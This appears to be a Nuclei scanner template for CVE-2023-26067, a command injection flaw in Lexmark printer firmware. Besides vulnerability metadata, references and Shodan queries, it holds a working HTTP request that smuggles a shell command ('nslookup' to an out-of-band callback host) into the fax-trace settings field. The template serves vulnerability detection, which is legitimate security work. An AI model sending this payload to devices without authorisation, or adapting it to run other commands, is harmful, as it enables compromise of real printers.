id: CVE-2023-26067 info: name: Lexmark Printers - Command Injection author: DhiyaneshDK severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). impact: | Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/ - https://github.com/horizon3ai/CVE-2023-26067 - https://nvd.nist.gov/vuln/detail/CVE-2023-26067 - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf - https://support.lexmark.com/alerts/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.10331 epss-percentile: 0.94831 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lexmark product: cxtpc_firmware shodan-query: - "Server: Lexmark_Web_Server" - "server: lexmark_web_server" tags: cve2023,cve,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' http: - raw: - | POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 49 FT_Custom_lbtrace=$({{cmd}}) matchers: - type: dsl dsl: - contains(interactsh_protocol, 'dns') - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and # digest: 4a0a00473045022009a7f099ca76e35c9d48ea76db7ae39595b4d7d3b44ad22778601e262454a850022100a8825d87405a7a25934d002aa1f95fa710796416b6d3ffd9a412cc026d1c6294:922c64590222798bb761d5b6d8e72950